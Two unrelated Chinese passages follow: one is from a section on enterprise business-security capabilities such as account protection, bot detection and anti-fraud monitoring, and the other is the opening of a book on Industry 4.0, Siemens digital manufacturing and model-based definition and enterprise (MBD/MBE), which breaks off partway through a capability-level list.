业务衍生的内部数据资源,能充分反映企业目前的业务发展状况、风险态势。利用内生数据和风控安全措施的有效聚合,建立起业务与风控安全统一的关系数据模型,可以打造企业针对自身业务特性以及立足于自己业务安全需求的安全能力。 ● 有效发挥大数据分析等AI技术的能力 利用大数据分析等技术,把不同业务环节的数据聚合成一个完整的业务安全数据视图,通过AI智能模型发现隐藏在复杂关系背后的业务安全问题。 ● 整合业务、合规、数据、AI技术能力 通过跨部门联动,打破业务安全管控环节的信息壁垒,将业务、合规、数据、AI技术进行能力整合。通过业务视角发现风险问题,利用业务内生数据资源,以AI技术为纽带,充分弥合风控安全与业务发展之间的割裂,进行业务安全一体化流程的重塑。利用内生业务安全能力有效对抗业务发展中出现的未知风险,将被动响应业务风险变为主动预警监测。 19.2.6 预期成效 ● 弥合业务风险管理盲点和漏洞 通过建设业务安全能力,充分利用业内数据,以科技手段延伸至以前因各种限制而导致工作未能有效覆盖的区域,帮助发现业务深层隐患,填补业务风险管理漏洞。 ● 有效降低由于内外部威胁带来的各类损失 通过建设业务安全能力,做到业务外部威胁及时预警、及时处置,业务内部违规风险实时监测,可知可控,确保覆盖风险盲区,保障企业资产免受、少受影响,将直接损失降至最低。 ● 为业务发展“保驾护航” 通过建设业务安全能力,有效提升业务转型及新业务开展工作的效能,及时适应业务变化,弹性配置适合新业务开展的业务安全需求,为新业务的开展与业务转型扫除障碍。 19.3 业务安全能力支撑建设要点 19.3.1 业务支撑要点 ● 互联网服务业务领域 主要关注为业务平台嵌入客户账户保护、人机识别组件,接入客户账号保护、人机识别的安全服务,强化注册、登录等环节的安全管控,实现批量注册、虚假账号的识别和拦截。 ● 营销业务领域 主要关注建设营销安全系统,在隐私合规的前提下采用大数据智能技术,分析设备、环境、行为等信息,发现并防范刷单、薅羊毛等异常的“黑灰产”行为。 ● 操作风险业务领域 重点关注建设反欺诈监测平台,通过大数据分析、可视化分析等技术增强内外部欺诈风险事件的检测能力,通过欺诈风险事件的检测、分析、处置、反馈的闭环流程,完善业务操作风险的防范工作。 ● 渠道推广业务领域 在面向渠道推广业务领域,重点关注建设渠道反作弊系统,对抗虚假点击等流量作弊;在面向音视图文等内容业务领域,重点关注为业务平台嵌入内容安全组件,接入内容安全服务,发现并拦截涉恐、涉黄等非法内容,保障平台内容安全及业务合规。 19.3.2 建设技术要点 随着大量企业将业务线上化,越来越多的黑产、不法分子纷纷将目标转向企业的在线业务。企业在面对内外部威胁的同时,还需要将客户身份及隐私信息纳入企业数据安全防护体系,防范客户身份信息泄露和盗用。这也为企业在针对业务安全环节上的技术能力提出了新要求:首先,具有可以全面探知各业务领域风险点的业务风险态势感知能力;其次,具有有效整合内外部数据的大数据分析能力、可视化分析能力;再次,具有对抗内外部威胁的反欺诈情报能力;最后,培养自身不断助力业务发展创新的建模能力。以上4种能力是打造企业级业务安全所需的整体技术能力,所需的技术支持会因业务的不同而不同,举例如下。 ● 建立账号安全保护机制 重点制备客户账号保护组件,在注册、登录页面嵌入客户账号保护组件,对接注册和登录系统,接入具备识别虚假注册、盗号登录、撞库盗号等安全能力的客户账号保护服务,结合威胁情报输出判定结果并反馈给注册和登录系统处置。 ● 配置人机识别组件 将人机识别组件嵌入访问页面,对接业务系统,接入人机识别的安全服务,利用浏览器指纹、用户行为分析、自动浏览器检测等技术结合威胁情报输出判定结果并反馈给业务系统进行拦截,有效解决身份识别问题。 ● 构建身份信息防护体系 将涉及客户身份及隐私信息的系统纳入企业数据安全防护体系,利用防护体系中的API安全代理、数据访问控制系统、数据脱敏系统加强API接口、数据的访问控制,进行数据脱敏,防范客户信息泄露。 ● 建设营销活动安全系统 重点制备数据采集组件,在关键业务流程中嵌入数据采集组件,并搜集数据,通过团伙挖掘、异常行为分析等技术建立针对刷单、薅羊毛等异常行为的安全策略和模型并上线,结合威胁情报输出判定结果并反馈给业务系统处置。 ● 建设反欺诈监测平台 针对业务中涉及的操作风险问题,应建设反欺诈监测平台,对接业务系统,通过业务访谈提炼业务风险点,利用大数据分析、可视化分析、用户行为分析等技术分析业务数据,结合威胁情报建立安全策略和模型并上线,实现欺诈风险事件的检测、调查分析、响应、反馈等闭环处置。 ● 建设渠道反作弊系统 针对渠道推广业务问题,应建设渠道反作弊系统,通过制备数据采集组件,在业务平台添加数据采集组件,采集设备、环境、行为等数据,结合威胁情报建立针对虚假点击等行为的安全策略和模型,对接业务平台,实现作弊行为的实时过滤。 ● 构建内容拦截机制 重点制备内容安全组件,为业务平台嵌入内容安全组件,对接业务平台,为接入内容提供安全服务,在发现涉黄、涉恐等非法内容时,结合威胁情报反馈给业务平台进行拦截,从而解决音视图文等内容业务问题。
standards
工业4.0实战-装备制造业数字化之道 愿景篇 NX NX是西门子工业软件公司提供的计算机辅助设计、分析、制造一体化数字化研发解决方案,是业界唯一能够处理产品开发过程中各个方面问题的一体化解决方案,从概念构思直至制造的所有环节,包括工业造型设计、包装设计、机械设计、机电设计、机械仿真、机电仿真、工装夹具和模具、机械加工、工程流程管理等,NX提供了完整集成的流程自动化工具套件,从而使整个产品开发流程发生质的变革。 NX最新版本构建在西门子的全息PLM技术框架之上,提供可视程度更高的信息、分析,从而改善协同和决策过程,提高整个产品开发过程中的生产效率,借助用于设计、仿真、制造的最新工具与扩展功能,可帮助用户开发出更具创新性的产品,大大提升生产效率。 NX可提高设计效率 。借助NX中的最新工具和改进的工具,可提高生产效率并加快设计过程,除扩大了全息三维(HD3D)支持范围以实现更出色的设计、决策以外,NX还提供了功能更强大、更高效的建模、制图、验证等工具。 NX可提高仿真效率 。可将用于准备和解算分析模型的时间缩短70%。借助NX仿真,可以快速构建、更新和仿真分析模型,做出更明智的工程决策,从而更快速地提供更好的产品。NX CAE提供了用于优化和多物理场分析的最新解决方案,以及用于分析复杂装配模型的最新方法。NX Nastran包括对非线性分析和动态分析的多项改进,并且提供了计算性能和建模易用性。 NX可提高制造效率 。通过机床和工装设计方面的最新功能或扩展功能,NX将两个重要行业部门的零件制造效率提高到了新的水平。对于机床,NX提供了适用于机床的重型设备零件生产并且经过优化的NC编程功能,NX在工装设计领域的最新发展将设计自动化与基于CAE的验证工具结合起来,可帮助企业实现“一次即成功”的设计并赢得更多高价值项目。 第1章 “工业4.0”——制造业的未来 1.1 第四次工业革命——“工业4.0” 随着制造业再次成为全球经济稳定发展的驱动力,世界各主要工业国家都加快了工业发展的步伐:从美国的“制造业复兴”计划到德国的“工业4.0”战略,再到中国的“十二五”发展规划,制造业正逐步成为各国经济发展的重中之重,引领未来制造业的方向也成为制造业强国竞争的一个战略制高点。 两个多世纪以前,蒸汽机的发明带来的第一次工业革命开启了农业社会向工业社会的转变。20世纪初期,随着电力的应用、劳动分工和大规模生产的出现,拉开了第二次工业革命的大幕。20世纪70年代后,随着自动化技术的出现,开创了第三次工业革命。前三次工业革命源于生产的机械化、电气化和信息化改造。当前,随着信息物理系统(Cyber-physical System,简称CPS)在制造业中的推广应用,正在引发第四次工业革命。“工业4.0”概念就是以数字制造为核心的第四次工业革命,工业革命的历史如图1-1所示。 “工业4.0”首先是由德国工程院、西门子公司等产学界领袖联合提出的,被德国政府确定为《高技术战略2020》十大未来项目之一,旨在支持工业领域新一代革命性技术的研发与创新,在2013年4月的汉诺威工业博览会上正式推出,并于2013年9月在上海工博会上推介给中国市场。该战略已经得到德国科研机构和产业界的广泛认同,西门子公司也已经开始将这一概念引入其工业软件开发和生产控制系统中。 提高生产力、缩短产品上市时间、采取更灵活的生产模式以及提高资源和能源利用效率,是全球工业面临的挑战,也是“工业4.0”提出的未来制造业的目标。为了实现这种先进的生产模式,需要融合现实生产和虚拟生产的技术,基于大数据、互联网、人,通过数字化工程、数字化制造等各种信息技术实现柔性制造,经济高效地满足客户个性化的定制需求。未来工厂的智能化程度将很高,这种智能将通过使用微型化处理器、存储装置、传感器和发送器来实现,这些装置将被嵌入几乎所有的设备、半成品和材料以及用于组织数据流的智能工具和新型软件中。所有这些创新将使产品和设备能够相互通信并交换命令。未来的工厂将在很大程度上自行控制和优化其制造工序,实现智能制造。 图1-1 工业革命的历史 这一切的变化都将通过信息物理系统实现。随着虚拟世界生成的信息流向实际物理世界的制造过程,全新的生产环境由此诞生。工业4.0带来的智能将人从执行例行任务中解放出来,使得他们能够专注于创新、增值的活动。工业4.0的标志性特征有如下三点。 ·通过价值链和价值网络实现企业间的横向集成 。在工业4.0环境下,企业通过CPS系统,可以保障新商业策略、价值网络和商业模式得到持续的支持和实施。横向集成是指将各种企业内和企业间的商业运营IT系统集成在一起,实现全供应链的集成 (见图1-2)。 ·贯穿整个价值链的端到端的设计工程数字化集成 。CPS系统使得产品的开发、制造及服务可以实时地在虚拟世界进行仿真研究,并控制现实的制造过程,实现全数字化的价值链 (见图1-3)。 ·企业内部可灵活重组网络化制造系统的纵向集成 。在智能工厂中,柔性的制造模式将不同层面的自动化IT系统(执行器、传感器、控制器、制造执行系统、企业计划系统等层面)集成在一起,灵活地按照生产任务进行组织,实现全集成自动化 (见图1-4)。 图1-2 横向全供应链集成 图1-3 全数字化的价值链 图1-4 纵向全集成自动化 工业4.0将应对并解决当今世界所面临的诸如资源与能源利用效率、城市生产和人口结构变化等一系列挑战。它将为制造业和社会带来如下收益。 ·满足用户个性化需求。工业4.0可以在设计、配置、规划、制造和运作等环节考虑个体的特殊需求,也可以保障企业在产品批量很低的情况下仍然获利。 ·灵活性。基于CPS的自组织网络,可以根据业务过程的不同方面,如质量、时间、风险、价格等,进行动态配置。这有利于供应链的“微调”,也意味着工艺流程可以更加灵活。 ·决策优化。工业4.0通过集成,实现横向、纵向实时透明,使得决策有强大的数据支持,并且可以及时得到验证,达到全局最优。 ·生产效率优化。CPS贯穿在整个价值网络中,对制造过程进行优化。 ·通过服务创造价值。通过CPS的大数据智能,企业可以创造新的价值服务。 ·应对人口的变化。工业4.0将提供灵活多样化的职业路径,让人们的工作生涯更长,并保持生产能力。 ·工作和生活的平衡。CPS使得公司的工作组织模式更加灵活,可以让员工在工作、生活之间获得更好的平衡。 2015年,中国政府正式提出了“中国制造2025”的战略。“中国制造2025”和“互联网+”的概念包罗万象,其内容相当于美欧日近年来相关战略计划的有机综合。表1-1详细对比了中国制造2025、德国工业4.0和美国的制造业复兴的战略内容、特征等信息。从这些特征来看,整个工业领域也正在经历一场制造业的大变革,这将引领传统制造业迈向定制化、信息化、数字化和绿色化。 表1-1 中国、德国、美国制造战略对比 1.2 中国制造2025规划 “中国制造2025”是中国版的“工业4.0”规划。“中国制造2025”明确提出,到2025年迈入制造强国行列,2035年制造业整体达到世界制造强国阵营中等水平,新中国成立一百年时制造业大国地位更加巩固,综合实力进入世界制造强国前列。中国制造2025包含五项重大工程和九项主要任务。 1.2.1 中国制造2025的五项重大工程 ·国家制造业创新中心建设工程 ,面向未来的10大重点领域的基础研究和产业化的工程,建设一批产、学、研、用相结合的制造业创新中心。 ·工业强基工程 ,主要解决基础零部件、基础工艺、基础材料落后问题。 ·绿色制造工程 ,加快实施工业绿色发展战略,全面推进企业的清洁生产,大力推进节能环保产业发展等。 ·高端装备制造业创新 ,在实施互联网、数控设备、大飞机等专项的基础上,推进新的高端装备创新专项。 ·智能制造 ,新一轮科技革命的核心也是制造业数字化、网络化、智能化的主攻方向,通过智能制造,带动产业数字化水平和智能化水平的提高。 1.2.2 中国制造2025的九大任务 ·提高国家制造业创新能力。我国制造业的巨大规模和低成本的传统优势并不能成为企业发展的不竭动力,只有技术进步的支持和自主创新能力的培育才能给企业带来持久的竞争优势。 ·强化工业基础能力。2015年,工信部将继续开展工业强基专项行动,完善政策措施,加大工作力度,持续提升工业基础能力,加快促进工业转型升级。 ·全面推进绿色制造。工信部将全面推进钢铁、有色、化工、建材、造纸、印染等传统制造业绿色化改造,降低重点行业能耗,提高产品制造效率。 ·深入推进制造业结构调整。产业结构调整是未来十年中国经济“新常态”形成的重要根基。只有顺应全球产业发展趋势,把握关键性行业,形成产业优势,力争有所突破,才能在未来的世界政治经济格局中具有竞争力。 ·提高制造业国际化发展水平。一是重视标准的制订,争取国际话语权;二是努力增加高质量高附加值的产品;三是重视自主创新,发展核心技术;四是重视人力资本,提高劳动者素质。 ·推进信息化与工业化深度融合。两化深度融合是指信息化与工业化在更大的范围、更细的行业、更广的领域、更高的层次、更深的应用、更多的智能方面实现彼此交融。 ·加强质量品牌建设。质量品牌战略是提高工业发展质量、效益的重要抓手和有效举措。质量竞争力指数已纳入制造强国指标体系。 ·大力推动重点领域突破性发展,发展先进轨道交通装备、节能与新能源汽车、电力装备、新材料、生物医药及高性能医疗器械、农业机械装备等重点领域。 ·积极发展服务型制造业和生产性服务业,通过“制造服务化”和“服务型制造”模式的变革,促进生产环节向高附加值的两端延伸,从而增强制造企业的盈利能力,更好、更丰富地满足消费者偏好。 1.3 西门子的“工业4.0”最佳实践 西门子认为,制造业存在如下基本需求——保障产品质量、提高生产效率、缩短产品上市时间、增加制造的灵活性。然而在传统的制造条件下,企业通常要牺牲灵活性来提升生产效率、缩短产品上市时间。如何同时满足这些需求决定了西门子的创新方向——智能制造,这也就是西门子定义的“工业4.0”。 有“欧洲最佳工厂”之称的西门子德国安贝格电子制造工厂是西门子打造的第一个数字化工厂(见图1-5),正是由这家工厂探索出了从传统制造向数字制造转型的技术线路。西门子中国成都工厂SEWC作为安贝格在中国的双胞胎工厂,也实现了从企业管理、产品研发到制造控制层面的高度互联,通过在整个价值链中集成IT系统应用,实现涵盖设计、生产、物流、市场和销售等诸多环节在内的高度复杂的全生命周期的自动化控制和管理。SEWC于2013年9月11日正式开始运营。 图1-5 西门子数字化工厂 关于SEWC,让用户和分析师津津乐道的是这座工厂不仅是一个数字化企业,而且绝大多数技术来自西门子。工厂里生产的每一件新品,都拥有自己的数据信息,数据在研发、生产、物流的各环节不断丰富,并实时保存在一个数据平台中。基于这一数据基础,ERP、PLM、MES、控制系统以及供应链管理实现了信息互联。工厂采用了西门子PLM(全生命周期管理)软件,通过虚拟化的产品规划和设计,实现信息无缝互联。利用制造执行系统SIMATIC IT和全集成自动化解决方案(TIA),将产品和生产生命周期进行集成,缩短产品上市时间。该设计还赋予工厂灵活性,可满足1500多种不同产品的混线生产(允许批量为1),并为将来的产能调整做出合理规划。 1.4 西门子助力中国“工业4.0” 在中国,西门子作为本土工业企业的合作伙伴已有140多年历史,见证并参与了中国制造业的发展,对中国制造业有着深刻而准确的理解。现在,西门子将现实和虚拟的生产世界相结合,着力推动制造业在未来的发展,其具有前瞻性的远景规划、丰富的行业知识,为工业4.0及数字化企业平台的未来发展奠定了坚实的基础。典型的西门子数字化制造平台如图1-6所示。 图1-6 西门子数字化制造平台 西门子工业软件平台是实现工业4.0的载体。它可以实现包括产品设计、生产规划、生产工程,直到生产执行和服务的全生命周期的高效运行,以最小的资源消耗获取最高的生产效率。该平台的实现需要企业以数字化技术为基础,在物联网、云计算、大数据、工业以太网等技术的强力支持下,集成目前最先进的生产管理系统及生产过程软件、硬件,如产品生命周期管理软件、制造执行系统软件和全集成自动化技术。西门子的整体解决方案可以帮助中国工业企业实现升级转型,以更高生产力、更高效能、更短产品上市时间、更强灵活性在国际竞争中占据先机。 总之,作为工业技术和工业软件的全球领导者,西门子将积极在中国的“工业4.0”变革(也就是“两化深度融合”的高级阶段)中扮演世界级的实践者和战略供应商两个关键角色。作为世界级的实践者,西门子自身使用自己发明创造的技术实现卓越运营,为广大用户提供实践经验;作为战略提供商,西门子愿意和广大用户分享这些经验,并提供世界级的工业软件和解决方案,一起推动“工业4.0”的变革进程。 第2章 从MBD走向MBE 2.1 概述 当前,国内外大型装备制造企业的数字化技术发展迅速,三维数字化设计技术得到了广泛的应用,基于模型定义(Model-Based Definition,MBD)的数字化设计与制造技术已经成为制造业信息化的发展趋势。MBD是产品数字化定义的先进方法,它是指产品定义的各类信息按照模型的方式组织,其核心内容是产品的几何模型,所有相关的工艺描述信息、属性信息、管理信息等都附着在产品的三维模型中,一般情况下不再需要二维工程图纸。MBD改变了传统的由三维实体模型来描述几何信息,用二维工程图纸来定义尺寸、公差和工艺信息的产品数字化定义方法。同时,MBD使三维数模作为生产制造过程中的唯一依据,改变了传统以二维工程图纸为主、以三维实体模型为辅的制造方法。 目前,国外MBD技术的应用已经比较成熟,如波音公司在以波音787为代表的新型客机研制过程中,全面采用了MBD技术,将三维产品制造信息与三维设计信息共同定义到产品的三维模型中,摒弃二维图样,将MBD模型作为制造的唯一依据,开创了飞机数字化设计制造的崭新模式。 近年来,国内大型装备制造企业已认识到MBD技术的优势,并逐步开始应用MBD技术进行产品设计,并将MBD模型作为制造的唯一依据。 但仅仅是MBD还无法完全实现最初提出的提高大型复杂系统的设计质量,减少制造交货时间,以及减少工程变更、减少产品缺陷、提高首次质量等目标。为了更好地使MBD数据在产品的整个生命周期内能够有效充分地进行利用,很多大型装备提供商、供应商通过不同的型号项目开始研究、验证和应用MBE(Model Based Enterprise,基于模型的企业)方法,就是要基于MBD在整个企业和供应链范围内建立一个集成和协同化的环境,各业务环节充分利用已有的MBD单一数据源开展工作,从而有效地缩短整个产品研制周期,改善生产现场工作环境,提高产品质量和生产效率。MBE也获得了美国国防部、美国陆军研究实验室等代表客户方单位的大力支持,并在某些大型项目中提供相关的帮助,不仅对MBD/MBE进行了系统的阐述和研究,同时,也通过国家项目进行资助和验证。 美国“下一代制造技术计划(The Next Generation Manufacturing Technologies Initiative,简称NGMTI)”是美国军方和重要制造企业合作发展制造技术的计划,旨在加速制造技术突破性发展,以加强国防工业的基础和改善美国制造企业在全球经济竞争中的地位。该计划于2005年提出,将于2016年部分完成。NGMTI计划定义的美国下一代制造技术共有6个目标,其中第一个就是“基于模型的企业(Model-Based Enterprise,简称MBE)”,其发展历程见图2-1。“基于模型的企业”项目将由美国爱荷华大学牵头,并由Rockwell Collins公司和雷神导弹系统公司资助。 图2-1 MBE发展历程 NGMTI提出的“基于模型的企业”是一种制造实体,它采用建模与仿真技术对设计、制造、产品支持的全部技术和业务的流程进行彻底改造、无缝集成以及战略管理;利用产品和过程模型来定义、执行、控制和管理企业的全部过程;并采用科学的模拟与分析工具,在产品生命周期的每一步做出最佳决策,从根本上减少产品创新、开发、制造和支持的时间和成本。 这个被美国国防部提出的词语和内涵,慢慢的也被很多商业公司所采纳。“基于模型的企业”已成为这种先进制造方法的具体体现,它的进展代表了数字化制造的未来。美国国防部和国家标准和技术研究所在2009年12月举行了“基于模型的企业”首脑会议和数据包(MBE/TDP)技术研讨会。会议汇集了超过75个专业课题方向的专家,针对国防部和其供应商如何有效处理技术数据提出更改建议。未来的变化都需要支持国防部过渡到基于数字模型而不是二维图纸的全生命周期管理。 MBE的核心内涵:基于模型的定义(Model-Based Definition,简称MBD)是核心;MBD数据创建一次并能被后续各业务环节直接使用;MBD模型作为配置的基础,并在此基础上对MBE的外延进行了扩展和说明,其中基于模型的系统工程和基于模型的维护是基于模型企业的应用和实践方向。 MBE的相关组成主要分为三大部分(见图2-2):基于模型的工程(Model-Based Engine-ering,简称MBe)、基于模型的数字化制造(Model Based Manufacturing,简称MBM)、基于模型的维护(Model Based Sustainment,简称MBS)。其中基于模型的工程是整个MBE实施的基础,特别大家比较熟悉的MBD也是基于模型工程的重要组成。 图2-2 MBE三大组成 2.1.1 基于模型的工程MBe 基于模型的工程是将模型作为技术基线的不可分割的一部分,包括整个生命周期中需求、分析、设计、实施和验证的能力,丰富了以前仅以MBD作为基于模型工程的一个独立部分,且也将基于模型的系统工程(Model Based System Engineering,简称MBSE)作为MBE的一个完善和未来的发展方向之一。 ·基于模型的系统工程MBSE :系统工程国际理事会(INCOSE)出版了系统工程2020年远景规划,提出了从过去以文档为中心的方法转向未来基于模型的方法的发展路径。INCOSE MBSE制定了一个路线图,重点标示出为实现2020年的远景规划,将MBSE的标准的制定作为努力的关键领域。MBSE是正式的建模应用程序,用以支持开始于概念设计阶段的系统需求、设计、分析、验证和确认。可以说系统工程(System Engineering,简称SE)是对整个产品的开发、部署和处置阶段的设计决策的协调,MBSE是一个接口,可以被认为是“将不同阶段黏合在一起”的一个系统化的方式。最近系统建模标准开始对MBSE应用和使用产生重大影响。对象管理集团(OMG)的系统建模语言(SysMLTM )是一种通用的,用于特定的设计、分析和验证复杂系统的图形化建模语言,在2006年由OMG采纳并已被广泛实施在MBSE支持工具中。SysMLTM 是一个更广泛的家族,是包括XML元数据交换(XMI)在内的由对象管理集团正在开发的标准的一部分。本标准规定了建模工具与XML格式文件之间的信息交互手段。ISO 10303-233应用协议系统工程(AP233)是一种数据交换的标准协议,以支持许多不同的SE工具之间的工程数据交换。事实上,AP233和SysMLTM 的要求已在很大程度上由OMG和ISO的团队一起保持一致,并与INCOSE模型驱动的系统设计工作组密切合作。模型和数据交换在推进MBSE实践以实现不同建模领域的一体化水平中是必不可少的。 ·基于模型的定义MBD :是指用集成的三维模型完整地表达产品定义信息,将设计信息和制造信息共同定义到产品的三维数字化模型中,以改变目前三维模型和二维工程图共存的局面,更好地保证产品定义数据的唯一性。 基于三维模型定义的核心是将产品三维模型打造为传递到下游生产活动所需详细信息的最恰当的载体,企业所有部门和团队都使用三维模型作为信息传递途径。 MBD数字模型的价值与产品的复杂程度成正比。如果用二维图纸描述复杂产品,则需要很多时间来培训使用者,以理解其复杂的结构与组织。有了三维MBD数据集,对专门技能的要求可以适当降低,使用者通过对模型进行平移、旋转和缩放就能够很容易地理解产品几何特征和相应的尺寸、公差。MBD数据集还可以表示隐含的信息,进行剖切或特定的测量。在三维模型加二维图纸的定义模式下,三维模型上并没有检验要求的描述,有关产品检验信息标注在二维图纸上。而应用MBD方法,可大大简化检验过程,应用基于三维模型的检验软件,直接读取三维模型上的尺寸和公差数据,在编制检验程序时,使用者的输入达到最小。利用便携式的坐标测量装置,可使检验深入到更多的制造环节中,能及时发现制造缺陷和不合格产品,在后续加工之前就将废品淘汰,避免进一步损失。基于MBD的产品研制方法将质量保证部门纳入到MBD技术体系中,使得产品设计制造形成具有反馈的封闭环,缩短了新产品研制周期,降低了研制成本。 针对MBD数字模型的表达,美国机械工程师协会从1997年1月发起关于三维模型标注标准的起草工作,以解决图纸与信息系统传输之间的矛盾。此标准于2003年7月被美国机械工程师协会接纳为新标准(ASME Y14.41)。随后,Siemens、PTC、Dassault等公司将该标准应用于各自的CAD系统中,对三维标注进行了支持。作为该项技术的发起者之一,波音公司在787项目中开始推广使用该项技术,从设计开始,波音公司作为上游企业,全面在合作伙伴中推行MBD技术。波音公司采用MBD技术后,在生产管理和生产效率上取得了本质的飞跃。 通过应用MBD技术可以为企业带来的好处包括: ·当制造工程师使用3D模型时,将大大减少物理样机的制造; ·3D工具应用将缩短30%~50%的产品开发周期; ·标准件库在总成装配上应用将减少大量时间; ·3D模型的使用将减少30%~40%的模型不一致。30%~40%的模型不一致是由2D图纸的不准确造成。 正是鉴于MBD技术的效益和国外先进装备企业采用MBD技术后取得的巨大成功,国内的大型装备制造企业逐渐开始学习MBD技术,并逐步将MBD应用于现实生产中。但国内大型装备制造企业对于MBD技术的学习与应用起步比较晚,现实生产中的应用并不成熟,需要深入研究和逐步推广。 2.1.2 基于模型的数字化制造MBM 基于模型的企业(MBE)是由许多相关的过程组成,基于模型的数字化制造(MBM)是其中关键的过程之一,MBM使用基于模型的定义(MBD)过程中创建的模型,不仅重用MBD中所包含的产品几何表示,还重用很多的文本或存储在MBD模型中的“元数据”。这消除了传统的以手工方式重建数据以创建用于生产的工艺过程定义的过程。 MBM模型用于虚拟制造环境内部进行工艺规划设计、优化和管理,直至提供给生产现场。MBM过程交付物成果包括:三维零件工艺、三维装配工艺、数控程序、三维电子作业指导书、传统的作业指导书、离散事件仿真等。所有这些活动或工作都可以在某些情况下开始并有可能在完成设计之前完成。事实上,如果使用得当,MBM允许在切削任何实物之前都能进行制造和装配过程仿真,反过来说,这使得制造工程师可以向设计团队提供反馈以创建一个可制造性更好的设计。 作为MBM中重要组成部分的基于模型的作业指导书(Model Based Instruction,MBI)是连接虚拟和生产现场的关键环节。MBI是在MBM制造过程系统中生成和管理的,并基于3D设计模型生成的车间工作指导书。MBI在车间现场消除了纸质的二维作业文档,直接使用MBD的相关3D数据和基于三维的工艺信息。MBI和现场的制造执行系统MES集成在一起,在MBI的主屏幕上,设置人机交互功能,可以采集及时发生的问题,并加入到数字模型中以进行未来的改进和版本管理。 通过使用基于模型的数字化制造(MBM),可以解决以下问题: ·减少转换产品定义到可用的工艺过程定义所需的时间; ·通过限制或消除重建模型的需求以减少出错的机会; ·允许在产品正式生产制造前进行制造工艺过程的虚拟验证; ·允许早期制造数据向设计的反馈。 2.1.3 基于模型的维护MBS 国防行业随着维持武器系统运行的时间比原来设计的越来越长,以及国防在未来越来越少的预算,迫切需要采取类似于MBS的维持技术以提高运行维护效率和降低生命周期成本。同时,随着MBE在各类装备制造业的实践和实施,未来基于模型的技术应用必然会扩展到产品生命周期的维修阶段。在产品和工艺开发过程中创建的模型和模拟仿真结果可以直接在整个产品生命周期的维护保障阶段使用,给用户和维护支持人员提供不断向下游传递的3D模型和相关数据。企业价值链成员将使用真实世界的效果和维护/维修/故障数据来评估产品和工艺的集成作业环境,反馈给产品设计,进行产品设计的改进。 目前大型装备维护领域还是由基于纸质及其他的非智能化数字化过程为主导,因此在维护保障领域基于模型的维护(MBS)具有节约成本的最大提升空间。当前这些过程都因为缺乏高品质的跨越整个供应链的集成系统工程数据而只能实现部分的优化: ·系统修改和升级。 ·定点维护,维修和大修。 ·现场维修和保养。 ·有竞争力的采购零件。 ·DMSMS(Diminishing Manufacturing Sources and Material Shortages)制造源萎缩、材料短缺管理和报废管理。 ·预测和状态检修。 一个基于模型的企业(MBE)的实施成功,模型必须成为企业流程中各环节协作的核心数据,该模型必须包括一个完整的产品定义,在应用上也必须是中性的数据。MBE的宗旨是:数据是创建一次,并能直接被所有数据使用者重复使用。该模型应该被视为系统记录和配置控制的基础。 下游业务过程中模型使用者应该使用模型参与产品开发周期的早期工作,如制造、成本和产品维护支持都可以基于模型来做,因此,模型不能仅仅包含几何模型信息,还必须包含制造信息,比如公差配合、注释和功能参数,以帮助沟通设计意图。该模型必须是一个完整的技术数据包,必须包含或关联相关的材料数据、过程规范、产品支持信息、测试和分析数据和其他文件。同时,另外一个关键因素是如何在组成企业的各个工程和业务部门之间有效传递和使用。 判断一个企业处于MBE的哪个阶段,可以从图2-3中的一些指标进行基本判断。该图是美国国家标准与技术研究院从超过10家美国的大型企业及其供应商的现场评估,参照MBE的定义得到的一个能力指数定义,通过一套详细的标准来定义MBE的能力,以帮助企业判断当前的状态并制定企业MBE的发展路线图。 图2-3 MBE能力矩阵 ·Level 0 :企业这个阶段能力水平是其他各级建立的基础。它的特点是主要依靠传统的二维图纸,有很少的地方使用3D模型。另外,事实上大多数(如果不是所有)下游数据使用者必须通过一种或多种方式来重新生成产品定义数据以有效利用上游数据。这一级别具有如下特点: ·二维工程图为主; ·没有或有少量三维模型; ·比较少的重用上游产品定义数据; ·手动创建技术数据包(Technical data package,TDP); ·有很少或没有与扩展企业连接; ·很少使用产品生命周期管理工具。 ·Level 1 :这个级别开始有效使用三维模型了。虽然仍是二维工程图为主,但是已经与三维模型关联并在一起进行管理。这一级也是第一次开始重用三维CAD模型数据,尽管都是通过输出中间格式文件来实现的。这个级别也由于开始重用数据而开始能够减少错误率和缩短交付时间。这一级别具有如下特点: ·二维工程图为主; ·三维模型与二维工程图关联; ·初始三维模型数据重用,通过输出中性格式文件(如STEP和IGES); ·手动创建TDP; ·有很少或没有与扩展企业连接; ·很少使用产品生命周期管理工具。 ·Level 2 :除了使用的不再是中性文件,而是重用原始的CAD数据文件外,本级能力水平本质上与Level 1是一样的。在有特别请求的情况下,原始CAD数据也可以被下游单位或者企业获得。当企业内部或下游企业使用相同的产品套件并且能够不需要数据转换就能充分使用三维模型时,对这些模型的访问将变得尤为重要。这进一步降低了错误的机会和任务交付时间。这一级别具有如下特点: ·二维工程图为主; ·三维模型与二维工程图关联; ·初始三维模型数据重用,通过原始三维模型数据格式; ·手动创建的TDP; ·有很少或没有与扩展企业连接。 ·Level 3 :这个能力级别是第一次考虑3D模型与二维工程图的结合作为产品定义的主要来源,在这个级别模型是几何定义,二维工程图作为特例并且是来自于包含了相关的产品制造信息(Product Manufacturing Information,简称PMI)模型的输出。采用了产品生命周期管理工具和轻量化的三维可视化文件作为交付使用,这个可视化文件是一个CAD的中性文件,并可为整个企业提供完整的产品定义,它们可以取代图纸。这个级别由于减少了对图纸的依赖,从而大大缩短了错误和交付时间。这一级别具有如下特点: ·3D模型与受控的二维工程图为主; ·二维工程图仅仅特殊情况下创建; ·模型被用于整个生命周期; ·手动创建的TDP; ·有很少或没有与扩展企业连接; ·内部使用产品生命周期管理工具。 ·Level 4 :这个能力级别是建立在Level 3级能力基础上。在这个级别,模型是唯一的产品定义,它也开始进一步将制造工具套件融入整个环境中,不仅仅是模型的重用,还包括各类元数据信息的直接重用。这也是进一步使用产品生命周期管理工具的结果,质量方面也是如此,最终使得在整个扩展企业中产品定义的交付实现了自动化。这一级别具有如下特点: ·3D模型为主; ·二维工程图创建属于例外; ·模型和元数据都集成并应用到了制造和质量领域; ·产品定义交付实现自动化; ·有很少或没有与扩展企业连接; ·内部使用产品生命周期管理工具… ·Level 5 :这个级别的能力是第一次成为一个真正的基于模型的企业,它同样建立在前面几个层级之上,但是增加了企业的连接。这样做可以使企业的所有人都可以访问到实时的、最新的产品定义,并可以全自动配置TDP。这一级别具有如下特点: ·3D模型为主; ·二维工程图创建属于例外; ·模型和元数据现在可以被整个扩展企业所访问、使用; ·自动化的TDP配置; ·在扩展企业之间有完全的连接; ·内部和外部使用产品生命周期管理工具。 ·Level 6 :这是迄今为止MBE能力定义的最高水平。本级建立在Level 